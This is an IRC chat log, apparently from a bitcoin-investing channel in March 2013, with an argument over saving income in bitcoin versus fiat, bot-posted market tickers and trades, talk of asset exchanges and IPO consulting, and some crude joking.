NEVER be cheaper then just using fiat Mar 23 22:10:44 I'm drunk Mar 23 22:10:55 there it's much simpler to pay btc than to convert back to fiat Mar 23 22:10:56 Too many % from tiberius Mar 23 22:11:09 jurov: no it isnt Mar 23 22:11:18 its simpler Mar 23 22:11:25 sorry i misread Mar 23 22:11:32 but you still are overpaying in the long run Mar 23 22:11:37 a business doesnt need to only accept btc Mar 23 22:11:39 vs getting RID of fiat Mar 23 22:11:53 the can accept both and use fiat for expenses Mar 23 22:11:58 btc sales will always be low or none existant Mar 23 22:12:02 vs fiat Mar 23 22:12:09 other then people who cant obtain the fiat Mar 23 22:12:29 maybe the amount of sales in btc is enough Mar 23 22:12:32 bitcoinstore is a prime example, it wont be around in its present form in 6months Mar 23 22:12:57 they are resorting to begging tactics for sales Mar 23 22:13:03 and alpaca socks croaked long ago, yea? Mar 23 22:13:25 no that seller probably sells 10x in fiat Mar 23 22:13:30 then in BTC Mar 23 22:13:50 bitcoinstore is btc only Mar 23 22:13:57 but there suppliers have to be paid in fiat Mar 23 22:14:08 what about the externalities? you didn't reply to that Mar 23 22:14:13 so youve introduced exchange rate fees as well Mar 23 22:14:33 the only externality is someone who doesnt have access to fiat and obtains BTC somehow Mar 23 22:14:45 or a BTC derived income wants to shop Mar 23 22:14:51 which is a tiny tiny customer base Mar 23 22:14:54 for example in whole eastern europe it often happens that banks are closed Mar 23 22:15:09 and deposits frozen Mar 23 22:15:23 i just said that... Mar 23 22:15:41 it isn't reported in media, but in greece it happened several times already in past 5 years Mar 23 22:15:50 and the last thing someone with frozen funds is going to be doing is shopping for laptops on bitcoinstore Mar 23 22:15:54 ;;seen topace_ Mar 23 22:15:54 topace_ was last seen in #bitcoin-assets 2 days, 19 hours, 51 minutes, and 43 seconds ago: haha Mar 23 22:16:02 yes i know jurov Mar 23 22:16:26 and even here business cash transactions over 1000 euro are illegal Mar 23 22:16:29 again the customer base for bitcoinstore is too small to be a viable business Mar 23 22:16:40 jurov: they still happen Mar 23 22:17:05 jurov: that means you cant cash buy BTC without breaking the law Mar 23 22:17:29 bitcoin consumer business's require bitcoin incomes Mar 23 22:17:36 the margins on tech stuff are too low Mar 23 22:17:37 of which nobody has other then a tiny % Mar 23 22:17:47 they cant dump prices enough Mar 23 22:18:01 they have exchange rate problems too Mar 23 22:18:15 again, why you think one can't convert their fiat income right after payday and then use btc exclusively? Mar 23 22:18:33 becuase why? Mar 23 22:18:43 its cheaper to use the fiat to buy the goods you need Mar 23 22:18:53 how cheaper? Mar 23 22:18:53 vs being down 5% off the bat just in exchange. Mar 23 22:19:01 what 5% Mar 23 22:19:03 ???? Mar 23 22:19:06 bitcoin is better to SAVE in. Mar 23 22:19:10 not to SPEND in Mar 23 22:19:18 that is a critical difference most people do not understand Mar 23 22:19:29 i'm talking about BOTH spending and saving Mar 23 22:19:44 actually if someone did what jurov suggests Mar 23 22:19:45 and added safety that once they convert, no one can freeze it Mar 23 22:19:48 since Jan 1 Mar 23 22:19:53 theyd be doing pretty well Mar 23 22:20:01 no theyu wouldnt Mar 23 22:20:10 they would only have done well if they saved 100% Mar 23 22:20:18 if they spent it, they missed out on the gains Mar 23 22:20:20 they woiuld have the maximum amount of their money in btc Mar 23 22:20:22 O.o you lose me here Mar 23 22:20:40 thickasthieves: i just said bitcoin is BETTER to save in Mar 23 22:20:41 tiberiusiv is confused. Mar 23 22:20:44 but WORSE to spend with Mar 23 22:20:48 so you're suggesting to forego eating etc. and save bitcoins instead? Mar 23 22:20:49 im not confused. Mar 23 22:21:02 no you use fiat for spending Mar 23 22:21:04 and BTC for saving Mar 23 22:21:34 fiat also offers more guarantee of the product Mar 23 22:21:36 semantics i guess Mar 23 22:21:41 look say i get 1000 euro paid. convert them immediately to 25BTC for 40 EURO/BTC Mar 23 22:21:43 its not semantics Mar 23 22:21:52 yes Mar 23 22:22:08 he doesnt spend it all instantly Mar 23 22:22:12 and then do what? Mar 23 22:22:12 then later i convert some back to fiat at 45 EUR/BTC when i need groceries/etc. Mar 23 22:22:26 say i convert 15BTC back Mar 23 22:22:27 what if its 35EUR/BTC Mar 23 22:22:31 when you need groceries Mar 23 22:22:32 saving for even a week in btc can make you money Mar 23 22:22:38 are you going to forego eating? Mar 23 22:22:51 thats not guaranteed. Mar 23 22:22:59 but grocery gift cards on bitmit? Mar 23 22:23:04 if i saved BTC at $20 in 2011. did i stop eating for an entire year? Mar 23 22:23:05 do an otc request? Mar 23 22:23:07 i dunno Mar 23 22:23:10 yes that's the risk. but then one has usually only to wait day or two Mar 23 22:23:11 when it went to $5 Mar 23 22:23:19 for the rate to recover Mar 23 22:23:24 thats not true jurov Mar 23 22:23:32 you had to wait 2 years for the rate to recover from 2011 Mar 23 22:23:34 when it was not true? last time in 2011 Mar 23 22:23:36 what are you talking about? Mar 23 22:23:44 in the summer of 2012 Mar 23 22:23:45 then your saving would be hit, too Mar 23 22:23:49 15 to 7 Mar 23 22:23:52 you waited weeks. Mar 23 22:24:02 YOU DONT HOLD BALANCES YOU NEED TO SPEND IN BTC Mar 23 22:24:05 YOU ONLY HOLD SAVINGS Mar 23 22:24:09 CALM THE FUCK DOWN Mar 23 22:24:15 your arguement is wrong. Mar 23 22:24:29 that was only 1 month of 12. rest 11 month it would work Mar 23 22:24:29 caps lock war ? Mar 23 22:24:39 tiberiusiv is funny Mar 23 22:24:44 so you starve for a month. Mar 23 22:24:49 tiberius i think youre pretty smart but a lot of your arguments amount to "no suh!" Mar 23 22:25:00 arguing to argue or something Mar 23 22:25:05 when the banks freeze, you starve too Mar 23 22:25:09 any money you need for immediate consumption or consumption purposes Mar 23 22:25:13 you keep in fiat Mar 23 22:25:19 jurov you have the option of paper cash Mar 23 22:25:28 you dont need to use the bank for anything otherthen cashing a paycheck Mar 23 22:25:33 of course people will hold some fiat Mar 23 22:25:34 but then ALL of your money is inaccessible, with btc you still have half Mar 23 22:25:34 even then you can cash it at 3rd parties Mar 23 22:25:39 its practical Mar 23 22:25:44 wrong again jurov Mar 23 22:25:50 people still hold fiat even with credit cards around forever Mar 23 22:26:03 you can hold cash Mar 23 22:26:27 yes, you have to get paid in cash Mar 23 22:26:31 BTC should only be used as a savings vehicle, and purchasing equities in viable BTC business's(which are rare) Mar 23 22:26:39 if the scales tip from fiat to btc, all these dynamics would shift anyway Mar 23 22:26:40 your opinion Mar 23 22:26:47 for consumption purposes, especially when liquidity is *immediately* required Mar 23 22:26:53 ie buying food or paying the rent Mar 23 22:26:57 you should keep cash. Mar 23 22:27:06 unless your lanlord accepts btc for food/rent Mar 23 22:27:09 tiberiusiv, everyone gets paid to bank acct here and to get cash you have to pay a fee Mar 23 22:27:20 so it's better to convert to btc outright Mar 23 22:27:30 for funds you dont immediately need Mar 23 22:27:39 you cant pay for groceries in btc Mar 23 22:27:44 what cant you comprehend? Mar 23 22:28:04 I pay groceries by converting BTC -> fiat Mar 23 22:28:08 yes, i convert back from btc only to pay for 2 weeks of groceries Mar 23 22:28:10 someone that bought BTC on friday with their entire paycheck, is now down 10%+ Mar 23 22:28:29 I actually get 100% of my income in BTC Mar 23 22:28:30 they have to wait for the price to rebound in time, of which there is no guarantee Mar 23 22:28:39 look tiberiusiv we understand you are butthurt but calm down, its simple math nothing new to see here, move along Mar 23 22:29:09 yes, but i believe on average this strategy will be successful Mar 23 22:29:13 anyone that followed your advice over the last 2-3 years has either starved to death or forced to take losses for immediate consumption needs jurov. Mar 23 22:29:24 you did? Mar 23 22:29:30 so you talk so sure Mar 23 22:29:35 jurov: do you have a bitcoin topped debit card or something ? Mar 23 22:29:51 a secret one that hes not telling us about Mar 23 22:30:02 no. but i can convert to bitcoins in 2 days with seap transfer Mar 23 22:30:05 *sepa Mar 23 22:30:09 2 hours Mar 23 22:30:12 and back Mar 23 22:30:13 what if the price tanks? Mar 23 22:30:20 and you need to pay rent or buy food Mar 23 22:30:26 or need immediate cash to buy things Mar 23 22:30:30 then i either lend fiat Mar 23 22:30:31 do you go hungry? Mar 23 22:30:42 or convert anyway Mar 23 22:30:54 as i stated numerous times Mar 23 22:31:13 because i expect that the rest of my btc investment will make up for that Mar 23 22:31:27 oooh ban? why? Mar 23 22:33:18 woah, ban Mar 23 22:33:22 fairly rare Mar 23 22:33:39 you know, to be here, you have to be able to grasp price of btc can go down, is all. Mar 23 22:33:54 so then i should be banned, no? Mar 23 22:33:58 lol Mar 23 22:34:02 :p Mar 23 22:34:10 you get it Mar 23 22:34:11 you can grasp it and still risk it all :) Mar 23 22:36:22 Church of Gresham's Law Mar 23 22:38:23 ouch Mar 23 22:38:31 and well, if indeed the price falls back to $5.. then i'll get a job, i guess :D Mar 23 22:38:45 hehe Mar 23 22:39:01 why would you get a job? Mar 23 22:39:25 i couldn't be living off coinbr then Mar 23 22:39:34 hm Mar 23 22:40:01 [MPEX] [S.MPOE] 3100 @ 0.00069056 = 2.1407 BTC [+] Mar 23 22:40:30 at least not with clear conscience, that is. Mar 23 22:42:58 What happened to tiberius? Was muted by assbot? Mar 23 22:43:13 +b Mar 23 22:43:47 he was a good troll though Mar 23 22:44:16 I still see tiberius in the room Mar 23 22:52:43 [MPEX] [S.BBET] 100 @ 0.0018 = 0.18 BTC [+] Mar 23 22:56:57 [MPEX] [S.MPOE] 16050 @ 0.00069616 = 11.1734 BTC [+] Mar 23 22:57:08 ;;ticker Mar 23 22:57:09 BTCUSD ticker | Best bid: 61.10002, Best ask: 61.35000, Bid-ask spread: 0.24998, Last trade: 61.10001, 24 hour volume: 165900.25850346, 24 hour low: 52.34560, 24 hour high: 70.78800, 24 hour vwap: 63.35623 Mar 23 23:01:45 [BTCTC] [PAJKA.BOND] 1 @ 0.07 BTC [-] Mar 23 23:02:59 tiber is banned? Mar 23 23:03:00 lol Mar 23 23:03:06 i hate that guy Mar 23 23:12:37 [BTCTC] [S.DICE-PT] 1 @ 0.00409 BTC [-] Mar 23 23:12:57 ;;ticker Mar 23 23:12:58 BTCUSD ticker | Best bid: 62.41109, Best ask: 62.88799, Bid-ask spread: 0.47690, Last trade: 62.84941, 24 hour volume: 159222.47535996, 24 hour low: 52.34560, 24 hour high: 70.78800, 24 hour vwap: 63.16369 Mar 23 23:25:15 ;;asks 70 Mar 23 23:25:18 There are currently 9945.1213 bitcoins offered at or under 70.0 USD, worth 678561.252983 USD in total. | Data vintage: 0.0025 seconds Mar 23 23:28:07 [BTCTC] [B.YABMC] 1 @ 0.014 BTC [+] Mar 23 23:31:37 [BTCTC] [PAJKA.BOND] 1 @ 0.108 BTC [+] Mar 23 23:32:55 ;;asks 60 Mar 23 23:32:57 There are currently 0 bitcoins offered at or under 60.0 USD, worth 0.0 USD in total. | Data vintage: 0.0021 seconds Mar 23 23:33:07 ;;bids 60 Mar 23 23:33:07 There are currently 5618.6104 bitcoins demanded at or over 60.0 USD, worth 343256.721569 USD in total. | Data vintage: 9.9809 seconds Mar 23 23:33:21 [BTCTC] [B.YABMC] 1 @ 0.014 BTC [+] Mar 23 23:33:22 weak Mar 23 23:33:24 [BTCTC] [B.YABMC] 2 @ 0.01401 = 0.028 BTC [+] Mar 23 23:34:37 [BTCTC] [B.YABMC] 1 @ 0.01401 BTC [+] Mar 23 23:34:43 [BTCTC] [B.YABMC] 1 @ 0.014 BTC [-] Mar 23 23:34:46 [BTCTC] [B.YABMC] 10 @ 0.01625 = 0.1625 BTC [+] Mar 23 23:34:48 [BTCTC] [B.YABMC] 59 @ 0.01989 = 1.1735 BTC [+] Mar 23 23:40:43 [BTCTC] [B.YABMC] 1 @ 0.01988 BTC [-] Mar 23 23:40:45 [BTCTC] [B.YABMC] 1 @ 0.01989 BTC [+] Mar 23 23:40:50 [BTCTC] [B.YABMC] 99 @ 0.0199 = 1.9701 BTC [+] Mar 23 23:40:53 [BTCTC] [B.YABMC] 334 @ 0.019929 = 6.6563 BTC [+] Mar 23 23:42:30 I haven't seen Ukto/Topace in a while Mar 23 23:45:21 Ukto is around a lot, just coding i think Mar 23 23:45:44 i think topace said he was taking a break for the weekend Mar 23 23:47:14 oh I see Mar 23 23:47:17 dammit Mar 23 23:47:37 Ukto chats some in #bitfunder too Mar 23 23:50:30 and our fellow goat seems to "wonder how shorting a stock on a guys own exchange would work" haha Mar 23 23:51:03 https://bitcointalk.org/index.php?topic=102333.msg1664519#msg1664519 Mar 23 23:51:24 [MPEX] [S.MPOE] 16319 @ 0.00069175 = 11.2887 BTC [-] Mar 23 23:51:25 [MPEX] [S.MPOE] 1181 @ 0.00069415 = 0.8198 BTC [+] Mar 23 23:51:54 Namworld, I see you run S.DICE-PT... currently lower than Havelock's SDICE so I wonder could I arb that? I only trade on HI so far but I keep seeing SDICE lower on MPEX and elsewhere so I may need to diversify. Mar 23 23:52:16 Not sure if arbitrage is the right concept, but at least diversification. Mar 23 23:53:38 Correct me if I'm wrong, I could only txfr the bitcoins around, not the SDICE shares between passthroughs? Mar 23 23:54:58 going afk to grab a bite but will swing back later to check logs Mar 23 23:56:40 you could arb if you owned shares in each location, or if you bought on mpex and trasferred (in some bulk, minimums depends on who youre dealing with, as do fees) Mar 24 00:05:30 [BTCTC] [B.YABMC] 1 @ 0.01992 BTC [-] Mar 24 00:09:06 [HAVELOCK] [VTX] 10 @ 0.635 = 6.35 BTC [-] Mar 24 00:11:05 [HAVELOCK] [SDICE] 4 @ 0.5094 = 2.0376 BTC [+] Mar 24 00:14:00 [BTCTC] [ASICMINER-PT] 1 @ 0.78 BTC [+] Mar 24 00:22:17 unbalanced_away: some of the PT ops allow what is called 'in-kind exchange' Mar 24 00:22:34 you'd basically need to strike deals with each individual Mar 24 00:26:12 stablized somewhat around 63? am I reading this correctly? Mar 24 00:26:25 ;;asks 70 Mar 24 00:26:27 There are currently 11411.366 bitcoins offered at or under 70.0 USD, worth 776280.483766 USD in total. | Data vintage: 0.0026 seconds Mar 24 00:26:28 ;;bids 60 Mar 24 00:26:28 There are currently 6959.0102 bitcoins demanded at or over 60.0 USD, worth 426621.296056 USD in total. | Data vintage: 0.7264 seconds Mar 24 00:29:51 benkay: I've heard that saying 'stable' or similar causes it to crumble Mar 24 00:33:09 BFL shipping next week or what? Mar 24 00:38:06 [HAVELOCK] [VTX] 4 @ 0.635 = 2.54 BTC [-] Mar 24 00:40:08 [MPEX] [S.MPOE] 17400 @ 0.00069238 = 12.0474 BTC [-] Mar 24 00:40:51 <[\\\]> heh Mar 24 00:40:55 <[\\\]> shipping in october, derp Mar 24 00:40:59 <[\\\]> how dare oyu question?! Mar 24 00:41:14 [MPEX] [O.BTCUSD.P590T] 14 @ 0.07 = 0.98 BTC Mar 24 00:41:22 your name drives me crazy! Mar 24 00:41:27 \\\ Mar 24 00:42:06 [HAVELOCK] [VTX] 4 @ 0.64999999 = 2.6 BTC [+] Mar 24 00:42:46 <[\\\]_b> oops Mar 24 00:42:53 hehe Mar 24 00:43:41 Thanks ThickAsThieves, smickles - I didn't think I was ready for the full MPEX but maybe at some point I'll get serious with this. Mar 24 00:44:06 [HAVELOCK] [VTX] 4 @ 0.64999999 = 2.6 BTC [+] Mar 24 00:44:16 Once I stop consistently doing the wrong thing at the wrong time I can begin to scale up. Mar 24 00:44:18 coinbr.com is an option Mar 24 00:44:49 if you dont wanna pay the mpex fee Mar 24 00:45:01 etc Mar 24 00:45:19 So it's a passthrough not a "fund" Mar 24 00:45:50 https://coinbr.com/ref?c=Q9gPSuUvYS (referral link) Mar 24 00:46:15 Nothing against the funds... I'd just like to use all available options and buy at the best price each time. Mar 24 00:46:47 Thanks for the link, I think I saw one from someone else the other day too but didn't get a chance to follow it that day. Mar 24 00:46:48 so youd want coinbr/mpex, btct.co, bitfunder.com, havelockinvestments.com Mar 24 00:46:53 there ThickAsThieves, I've been renamed. Mar 24 00:47:17 also litecoinglobal.com if you wanna dabble in ltc thru sdice, etc Mar 24 00:47:37 I'm gonna need more bitcoins. Mar 24 00:47:41 thanks! Mar 24 00:47:50 those slashes made reading a chore the other day Mar 24 00:47:55 for me at least Mar 24 00:49:06 [HAVELOCK] [SDICE] 8 @ 0.52999999 = 4.24 BTC [+] Mar 24 00:49:29 who said the magic word Mar 24 00:49:55 tiberius Mar 24 00:52:01 !r unbalanced_away Mar 24 00:53:55 see, i'm not crazy https://bitcointalk.org/index.php?topic=156833.msg1665126#msg1665126 Mar 24 00:53:59 ThickAsThieves> i'm playing a drinking game, every time tiberius quotes a % with authority <<< lol Mar 24 00:54:18 :) Mar 24 00:56:05 hi mircea_popescu, another magic world: deposits Mar 24 00:56:43 i think they be done Mar 24 00:59:13 http://trilema.com/2013/strategic-superiority-the-saga-continues/#comment-92457 Mar 24 00:59:16 ppl nuking my bad physics Mar 24 01:01:07 [BTCTC] [CRYPTO-TRADE] 4 @ 0.2 = 0.8 BTC [+] Mar 24 01:02:02 "There is a realistic possibility to me, that S.MPOE is in fact not owned by many actual individuals, rather than by few with multiple forum and bitcoin accounts. So please, consider my offer and be forewarned. I am just a messenger." Mar 24 01:02:14 in a sense i suppose as a new guy it's just as good an assumption as any other. Mar 24 01:02:25 in principle gavin could be satoshi too Mar 24 01:02:33 [MPEX] [S.MPOE] 7169 @ 0.00069415 = 4.9764 BTC [+] Mar 24 01:02:35 [MPEX] [S.MPOE] 4782 @ 0.00069569 = 3.3268 BTC [+] Mar 24 01:02:35 or you Mar 24 01:03:05 [HAVELOCK] [SDICE] 3 @ 0.525 = 1.575 BTC [-] Mar 24 01:03:28 yeah, or me. Mar 24 01:04:00 lol would you be capable to restrain yourself into satoshi's writing style? Mar 24 01:04:13 i don't think that possible Mar 24 01:05:14 [MPEX] [S.MPOE] 21047 @ 0.00069238 = 14.5725 BTC [-] Mar 24 01:05:15 [MPEX] [S.MPOE] 1300 @ 0.00068153 = 0.886 BTC [-] Mar 24 01:05:17 [MPEX] [S.MPOE] 5000 @ 0.00068152 = 3.4076 BTC [-] Mar 24 01:05:18 [MPEX] [S.MPOE] 6203 @ 0.00068141 = 4.2268 BTC [-] Mar 24 01:05:19 what people don't do for moneyz Mar 24 01:06:03 i see the silver debate is going well... Mar 24 01:08:08 mircea_popescu: no pm yet on that offer to help rpietila short s.mpoe Mar 24 01:08:12 go figure Mar 24 01:08:22 what do you guys think about an IPO consulting service Mar 24 01:08:31 i think there's money in that Mar 24 01:08:38 smickles surprisingly. Mar 24 01:08:53 ThickAsThieves i imagine it will become quite a revenue stream as things develop Mar 24 01:09:07 i have some ideas in the works Mar 24 01:09:28 my strength is a bit more on the marketing side Mar 24 01:09:30 but Mar 24 01:09:34 few people understand how to play strategically. putting out the cost to register today and expending the effort to trade/think it through will make you the investment banker of tomorrow. Mar 24 01:09:39 i could enlist more help too Mar 24 01:09:59 and i bet you in 2015 there will be idiots joining in a la that estonian dood, all indignant that the powers that be in bitcoin don't give two shits for his second rate irl accomplishments Mar 24 01:10:06 [HAVELOCK] [HIM] 1 @ 2 BTC [+] Mar 24 01:10:17 because they prefer to promote people who put the time and effort in when it mattered, and already have years' experience recorded. Mar 24 01:10:46 and lo and behold how fake and unfair it all is and how it won't survive. Mar 24 01:10:54 part of me wonders if i wouldnt just be facilitating scammers Mar 24 01:10:55 except it'll survive just fine, and own their ass into a fine paste until they submit. Mar 24 01:11:01 well, don't. Mar 24 01:11:02 but it has to start somewhere Mar 24 01:11:06 nah/ Mar 24 01:11:06 [HAVELOCK] [KCIM] 2 @ 1.25 = 2.5 BTC [+] Mar 24 01:11:09 the accountability Mar 24 01:11:20 and professionalization Mar 24 01:11:57 yiou never have to facilitate scammers. Mar 24 01:11:57 i doubt even 75% of the assets are missing spelling/grammar errors in the prosp Mar 24 01:12:06 (% from tiberius dont sue me!) Mar 24 01:12:40 i'd have to cover my ass too Mar 24 01:12:56 if i give bad advice Mar 24 01:14:27 [BTCTC] [ASICMINER-PT] 1 @ 0.829 BTC [+] Mar 24 01:14:30 [BTCTC] [ASICMINER-PT] 6 @ 0.834 = 5.004 BTC [+] Mar 24 01:14:32 [BTCTC] [ASICMINER-PT] 8 @ 0.834 = 6.672 BTC [+] Mar 24 01:16:38 well, actually i'm thinking about an IPO (not coinbr) and who could be consultant Mar 24 01:17:15 in your case, you have this whole room Mar 24 01:17:31 surely most of us would help Mar 24 01:17:32 yeah, i'll be your consultant lol Mar 24 01:17:35 but that service needs to plug bitcoins in anyway Mar 24 01:18:01 and i seriously doubt it will be mpex worthy anyway, more like ltc-global Mar 24 01:18:04 mp you'd be a good consultant if you needed the money Mar 24 01:18:24 but i'm pretty sure you dont Mar 24 01:18:45 there so much room for improvement at this point Mar 24 01:19:55 i was just offering it as a backstop Mar 24 01:20:01 not tryin' to take anyone's bread away. Mar 24 01:22:09 both creditor and consultant of last resort :) Mar 24 01:22:31 lol. Mar 24 01:22:41 universal backstop Mar 24 01:22:52 now go away and build shit. Mar 24 01:32:28 [BTCTC] [COGNITIVE] 3 @ 0.158 = 0.474 BTC [-] Mar 24 01:35:06 [HAVELOCK] [SDICE] 50 @ 0.5095 = 25.475 BTC [-] Mar 24 01:35:07 [HAVELOCK] [SDICE] 26 @ 0.5094 = 13.2444 BTC [-] Mar 24 01:35:26 nice guys Mar 24 01:35:44 by far the best bitcoin channel Mar 24 01:36:57 loooking forward to seeing the next diff Mar 24 01:37:16 i think petahashes by late summer is very possible Mar 24 01:37:29 [MPEX] [S.MPOE] 1287 @ 0.00068141 = 0.877 BTC [-] Mar 24 01:38:20 here you go! http://mpex.co/?mpsic=X.IDIFF.JUN Mar 24 01:39:01 ;;estimate Mar 24 01:39:02 Next difficulty estimate | 6640584.46211 based on data since last change | 7590073.16023 based on data for last three days Mar 24 01:39:34 possible. Mar 24 01:41:29 needs to increase at least, what, 25% each difficulty ti make X.IDIFF.JUn profitable? Mar 24 01:42:38 !ticker m x.idiff.jun Mar 24 01:42:39 [MPEX:X.IDIFF.JUN] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: / / ( shares, BTC), 30D: 0.08995 / 0.22998333 / 0.3 (3 shares, 0.69 BTC) Mar 24 01:42:48 $depth x.idiff.jun Mar 24 01:42:50 mircea_popescu: X.IDIFF.JUN Bids: ['149 @ 0.08995'] Mar 24 01:42:51 mircea_popescu: Asks: ['60 @ 0.24995', '8 @ 0.45', '30 @ 0.775'] Mar 24 01:43:06 has to triple practically. Mar 24 01:43:36 6 or 7 diff changes til then Mar 24 01:44:29 but it will expire long before then Mar 24 01:46:03 so i'm not sure if i buy at 0.24995 it will be significantly profitable at all Mar 24 01:46:21 pretty risky Mar 24 01:47:00 and mp refuses to reveal the backing, don't remember why Mar 24 01:48:26 ? Mar 24 01:49:37 i mean, if the difficulty oversteps the collateral, idiff expires automatically Mar 24 01:49:50 but you don't know the collateral, you can only guess Mar 24 01:49:53 ;;seen cusipzzz Mar 24 01:49:53 I have not seen cusipzzz. Mar 24 01:50:45 so i introduced https://bitfunder.com/asset/CoinBr.iDiff-E that has known max cover beforehand Mar 24 01:51:05 and it seems quite successful, 381 shares sold so far (arounf 0.1 each) Mar 24 01:51:15 oh i assumed it worked like yours Mar 24 01:51:21 havent bought mpex's yet Mar 24 01:51:54 the description says a date of exp Mar 24 01:51:59 liek yours does Mar 24 01:52:08 aside from the cover difference, mine expire much sooner Mar 24 01:52:15 in 2 months Mar 24 01:53:19 right, i like that better Mar 24 01:53:44 having it available monthly is cleaner Mar 24 01:54:46 also it has interesting psychological effect, when i raised iDiff-O backing to 0.3BTC max, someone asked whether it's prediction Mar 24 01:54:58 maybe it was you ThickAsThieves, no? Mar 24 01:55:14 nah Mar 24 01:55:32 i just look to see if i think i might have a chance at 10% or so Mar 24 01:55:39 ofc it isn't a prediction. the price i sell them is a prediction+healthy margin Mar 24 01:56:13 but it helps sales anyway i guess :) Mar 24 01:56:32 exposes you more too, but at least its only monthly Mar 24 01:56:39 much more manageable Mar 24 01:56:43 yes Mar 24 01:57:11 should be manageable with a little care. Mar 24 01:58:13 [MPEX] [S.MPOE] 13500 @ 0.00067591 = 9.1248 BTC [-] Mar 24 02:03:06 [HAVELOCK] [VTX] 4 @ 0.62 = 2.48 BTC [-] Mar 24 02:17:07 [HAVELOCK] [SDICE] 1 @ 0.53 BTC [+] Mar 24 02:22:28 ;;ticker Mar 24 02:22:28 BTCUSD ticker | Best bid: 63.38154, Best ask: 63.79372, Bid-ask spread: 0.41218, Last trade: 63.00000, 24 hour volume: 150392.80612442, 24 hour low: 52.34560, 24 hour high: 70.50250, 24 hour vwap: 62.64420 Mar 24 02:23:15 !ticker m ^OIX Mar 24 02:23:16 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 51.26732239 / 68.67982696 / 69.97754937 (21630 shares, 6,022.77 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 24 02:26:02 mircea_popescu: "I've always wanted to try my hand at investing, but I don't have much "spare" money, and am currently not working at all. BTCs are offering me an opportunity to not only invest starting small, but learn so much about international monetary policy, trading, markets & so forth. The BTC community here on Reddit is amazing (minus the inevitable trolls of course), and probably the most helpful and sincere group of people I've come a Mar 24 02:26:32 win. Mar 24 02:29:06 [HAVELOCK] [KCIM] 2 @ 1.25 = 2.5 BTC [+] Mar 24 02:31:06 [HAVELOCK] [HIM] 1 @ 2 BTC [+] Mar 24 02:32:40 whoever that is isn't an accredited investor Mar 24 02:32:47 they're going to get RUINED Mar 24 02:32:54 someone make some laws to protect them from themselves Mar 24 02:33:04 THAT'S WHAT WE NEED MORE REGULATION Mar 24 02:33:05 let the guy enjoy his money eh Mar 24 02:33:07 [HAVELOCK] [SDICE] 5 @ 0.53 = 2.65 BTC [+] Mar 24 02:33:15 MOAR REGS Mar 24 02:33:17 This guy is a genius. Lets invest 5000 BTC in benkay right now. Mar 24 02:33:31 ? Mar 24 02:33:34 i don't take dumb money. Mar 24 02:33:37 I will call up congress right now. Mar 24 02:34:01 do you bring something to investor/dev rel'n beyond cash? Mar 24 02:34:08 "We need you to regulate Bitcoin for us. A system that is not backed by any government to protect themselves from themselves" Mar 24 02:34:18 I work for a payment processor. Mar 24 02:34:23 Central Banks are a scam. Mar 24 02:34:32 homes I was makin teh funnies. Mar 24 02:34:54 Me too. Don't tell my employer I said that. :P Mar 24 02:34:55 jkjk Mar 24 02:35:08 i really feel for you real processors Mar 24 02:35:09 pci Mar 24 02:35:13 kyc Mar 24 02:35:15 LOLOLOLOL Mar 24 02:35:17 aml Mar 24 02:35:29 that's why satoshidice has ad on reddit Mar 24 02:35:33 the pretend money space is so much more relaxed Mar 24 02:35:59 It's not so much pretend money anymore. Mar 24 02:36:00 ya just fml here. Mar 24 02:36:01 and by relaxed i mean that instead of worrying about governments one worries about everyone Mar 24 02:36:01 did erik ever get any response from rkoi? Mar 24 02:36:05 "Win Bitcoins while stress testing the network" ftw Mar 24 02:36:23 !ticker m S.DICE Mar 24 02:36:24 [MPEX:S.DICE] 1D: 0.0044444 / 0.0044444 / 0.0044444 (100 shares, 0.44 BTC), 7D: 0.00320003 / 0.00441309 / 0.005598 (312412 shares, 1,378.70 BTC), 30D: 0.00300001 / 0.00545082 / 0.00638999 (1286541 shares, 7,012.71 BTC) Mar 24 02:36:30 wow, when did that happen? Mar 24 02:37:43 abstractly speaking i've considered in the past that as a species we should spend some effort figuring out ways to make society more adaptable to paradigm shifts Mar 24 02:37:56 +1 Mar 24 02:38:11 gotta get some flex in the regulatory apparatuses Mar 24 02:38:49 and philosophically speaking, ossification of power systems is a monotonic thing Mar 24 02:38:54 good example being how the internet gutted business, or globalization, etc Mar 24 02:39:14 "win hickeys while stresstesting my cock" Mar 24 02:39:17 changes that are bigger than just one state or country Mar 24 02:39:21 sounds totally legit this. why didn't i think of it Mar 24 02:39:37 "stress testing my cock" Mar 24 02:39:40 does not sound fun. Mar 24 02:39:54 hm Mar 24 02:40:08 i hear stress test, I think Mar 24 02:40:32 http://www.wired.com/images_blogs/autopia/2010/03/index-660x439.jpg Mar 24 02:40:32 ;;asks 70 Mar 24 02:40:35 There are currently 11864.004 bitcoins offered at or under 70.0 USD, worth 806882.964797 USD in total. | Data vintage: 0.0029 seconds Mar 24 02:40:38 ;;bids 60 Mar 24 02:40:38 There are currently 7816.305 bitcoins demanded at or over 60.0 USD, worth 479145.312198 USD in total. | Data vintage: 2.9141 seconds Mar 24 02:40:50 ;;asks 67 Mar 24 02:40:50 There are currently 3204.9602 bitcoins offered at or under 67.0 USD, worth 210775.267292 USD in total. | Data vintage: 14.9539 seconds Mar 24 02:40:54 and do not want ;) Mar 24 02:41:06 [HAVELOCK] [VTX] 1 @ 0.64 BTC [+] Mar 24 02:41:07 [HAVELOCK] [VTX] 1 @ 0.64 BTC [+] Mar 24 02:41:27 !ticker h HIM Mar 24 02:41:29 [HAVELOCK:HIM] 1D: 1.99999987 / 1.99999996 / 2.00000000 (3 shares, 5.99999987 BTC), 7D: 1.80000000 / 1.9774827 / 2.00000000 (133 shares, 263.00519931 BTC), 30D: 1.40000000 / 2.32302446 / 18.00000000 (554 shares, 1286.95555166 BTC) Mar 24 02:41:34 benkay i dunno what vaginas you've been to... Mar 24 02:42:12 stress test != flight test Mar 24 02:42:20 or production test Mar 24 02:42:45 stress test can burn up the drives on a poorly set up cluster Mar 24 02:42:54 you know, overload load balancer Mar 24 02:42:58 if even extant Mar 24 02:43:05 ;;seen smickles Mar 24 02:43:06 smickles was last seen in #bitcoin-assets 1 hour, 34 minutes, and 33 seconds ago: i think there's money in that Mar 24 02:43:31 i'm always down for behavioral tests Mar 24 02:43:38 UI tests Mar 24 02:43:48 "look and feel and fit" Mar 24 02:43:50 heh. Mar 24 02:44:00 lol Mar 24 02:44:25 i'm eager to know what kind of stress tests you want performed on your dick Mar 24 02:44:59 mostly crush pressure. Mar 24 02:45:11 heh Mar 24 02:45:18 also shear. Mar 24 02:45:24 shear lol Mar 24 